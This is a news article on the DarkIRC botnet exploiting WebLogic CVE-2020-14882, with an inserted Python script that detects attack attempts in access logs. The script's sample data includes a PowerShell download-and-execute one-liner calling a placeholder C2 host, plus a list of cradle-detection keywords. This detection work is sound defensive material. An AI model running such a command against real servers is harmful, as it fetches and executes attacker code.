Researchers: Malware Offered for Sale for $75
A botnet called DarkIRC is exploiting a severe remote code execution vulnerability in Oracle WebLogic for which a patch was issued almost two months ago, Juniper Threat Labs reports. Meanwhile, the malware used to build the botnet is being offered for sale on a darknet hacking forum.
Along with the DarkIRC botnet, researchers at Juniper Threat Labs are tracking four other malware variants that are attempting to take advantage of the WebLogic vulnerability, including a version of the Mirai botnet and a weaponized version of the Cobalt Strike penetration testing tool.
The WebLogic flaw, tracked as CVE-2020-14882, is a remote code execution vulnerability that can be exploited over a network without the need for a username and password. A threat actor would only have to send a malicious HTTP request to the WebLogic Server's administration console to initiate the attack, according to an earlier update from Oracle.
Oracle and the U.S. Cybersecurity and Infrastructure Security Agency have issued alerts about the importance of applying the patch, which has been available since October (see: CISA and Oracle Warn Over WebLogic Server Vulnerability).
Despite the warnings, about 3,100 WebLogic servers remain vulnerable to CVE-2020-14882, according to Juniper Threat Labs. Using the Shodan search engine, researchers at the firm found about 850 unpatched servers in China and another 600 in the U.S.
Paul Kimayong, a threat researcher at Juniper Threat Labs, notes that hackers are increasingly exploiting vulnerabilities in products such as WebLogic and other web application servers for a variety of purposes, including building out a botnet's network.
"Threat actors typically use what is available on the market to their advantage," Kimayong says. "For instance, some of the attacks we're seeing are using exploits available on public sites like Exploit-db or GitHub. Sometimes it doesn't matter to them whether the exploit is old or not, as long as there are vulnerable systems that they can attack."
DarkIRC is a multifaceted botnet that can be used as a browser stealer or a keylogger. It can launch distributed denial-of-service attacks, execute commands and download files from infected devices, according to the Juniper Threat Labs report.
The botnet can also act as a bitcoin clipper, replacing a copied bitcoin wallet address with the malware operator's bitcoin wallet address. This essentially allows it to hijack bitcoin transactions on the infected system, the report notes.
In the campaign that researchers uncovered, the DarkIRC botnet issues an HTTP GET request that targets a vulnerable WebLogic server, which then executes a PowerShell script to download and run a binary file.
Before deploying the final malware, the botnet checks whether the server is running in any virtual environment, including those from VMware, VirtualBox, VBox, QEMU and Xen, the report notes. If any of these are detected, the attack stops. This is part of DarkIRC's anti-sandbox and anti-detection techniques.
If the botnet doesn't detect these virtual machines, the malware is unpacked and installed in a Chrome file to help maintain persistence. It then sets up an autorun command, according to the report.
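The infection chain above starts with a GET request to the WebLogic administration console that carries a PowerShell download-and-execute command. As an added example (not code from the Juniper report or from Oracle), the following Python scans web server access-log lines for exactly that combination: a request whose target sits under the console path and whose decoded query contains PowerShell download-cradle indicators. The log format (Apache combined style), the indicator list, and the sample lines, including the `c2.example.invalid` placeholder host, are all constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The third line models
# the pattern the report describes: a GET to the console path carrying a
# PowerShell download-and-execute one-liner. The fourth line contains the word
# "powershell" but targets an unrelated path, so it must not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Nov/2020:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Nov/2020:10:02:15 +0000] "GET /console/images/logo.png HTTP/1.1" 200 804 "-" "Mozilla/5.0"
203.0.113.44 - - [30/Nov/2020:10:03:40 +0000] "GET /console/?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX(New-Object%20Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1') HTTP/1.1" 200 0 "-" "curl/7.68.0"
198.51.100.9 - - [30/Nov/2020:10:04:10 +0000] "GET /app/search?q=powershell%20tutorial HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Apache combined-format fields we need: source IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Only requests aimed at the WebLogic admin console are of interest here.
CONSOLE_PREFIX = "/console"

# Lower-case substrings typical of a PowerShell download-and-execute cradle (assumed list).
POWERSHELL_INDICATORS = (
    "powershell", "pwsh", "downloadstring", "downloadfile",
    "invoke-expression", "iex(", "iex ", "-encodedcommand", " -enc ", "-w hidden",
)


@dataclass
class Finding:
    src: str
    ts: str
    target: str          # raw, still-encoded request target as logged
    indicators: list     # which substrings matched


def decode_target(target: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so double-encoded payloads are inspected too."""
    out = target
    for _ in range(rounds):
        nxt = unquote(out)
        if nxt == out:
            break
        out = nxt
    return out


def inspect_line(line: str):
    """Return a Finding for a console request carrying PowerShell indicators, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target")).lower()
    if not decoded.startswith(CONSOLE_PREFIX):
        return None
    hits = [ind for ind in POWERSHELL_INDICATORS if ind in decoded]
    if not hits:
        return None
    return Finding(m.group("src"), m.group("ts"), m.group("target"), hits)


def scan(log_text: str) -> list:
    """Scan every line of an access log and collect findings."""
    return [f for f in (inspect_line(ln) for ln in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.src} console request with PowerShell indicators: {f.indicators}")
```

Decoding twice before matching matters because attackers often double-encode query strings to slip past naive string matching; restricting the match to the console path keeps ordinary application traffic that merely mentions PowerShell out of the alert stream. In production the same logic belongs in the WAF or SIEM rule set rather than a standalone script, and any hit from a source that is not an administrator's address should be treated as an exploitation attempt against an unpatched server.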
Malware for Sale
The malware behind the DarkIRC botnet is being offered for sale on a darknet hacking forum for what appears to be a one-time price of $75, according to Juniper Threat Labs. A threat actor using the handle "Freak_OG" has been advertising the botnet since August.
The report notes that it isn't clear whether this threat actor is also conducting the ongoing DarkIRC campaign or whether someone who bought or rented the botnet malware is behind these attacks.